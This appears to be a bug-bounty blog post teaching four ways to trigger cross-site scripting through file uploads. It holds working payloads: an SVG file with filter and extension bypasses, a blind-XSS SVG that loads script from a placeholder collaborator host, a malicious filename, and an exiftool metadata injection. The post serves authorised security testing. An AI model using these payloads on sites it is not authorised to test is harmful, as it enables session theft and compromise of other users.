Multi XSS Exploit in Upload File

3 months ago 24

M7.Arman

Hello amazing hunters, Today i want to notice 4 ways to find xss in file upload that i found all of them in bug bounty programs or pentest programs. Let’s play this game…

XSS via SVG file

This is my favorite one that leads an attacker to upload an SVG file by XSS payload. For this scenario I have some recommendations for you to bypass some filters automatically.

First of all , upload your file by .png extension and capture it in burp suite then change it to .svg that leads you to bypass client extinction checker and if the uploader checks the content-type the of file, you are able to bypass it at same time.

Second, Use magic bytes first of your file that depends on your type file.

You can use some bypass for an extension for example, You can use null bytes: XSS.svg%00.png or you can use # , ; , ? , etc: XSS.svg#.png

Payload:

XSS.svg#.png

\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("M7.Arman");
</script>
</svg>

2. Blind XSS via SVG

All the number 1 bypasses are same here, The only difference is the payload, I recommend you to use this payload.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
<!-- Script linked from the outside-->
<script xlink:href="https://xxxx.burpcollaborator" />
<script>
//<![CDATA[
alert("M7.Arman");
]]>
</script>
</svg>

3. XSS via Filename

Sometimes our file name reflects on page after upload and you can inject some payload like XSS, SQL, S.S.T.I , C.S.T.I in file name then upload it. Be careful of some points, after uploading the file completely your payload runs. Sometimes during uploading your file name fire but after save page or submit message your payload does not reflect anymore. And other users like you have access to the page (same story as self-xss)

'"><img src=x onerror=alert("M7.Arman")>.png

4. XSS via Metadata

Sometimes when you upload a picture or pdf , etc. these file have some metadata that must be removed by uploading file. To test this scenario, Download this picture and upload it in this site that returns you some decryption. By exiftool you can inject some metadata to your file, After injecting a payload to your picture, Upload it to the vulnerability site if return any alert for you…. HAPPY HUNTING

exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ Exif.jpeg
Read Entire Article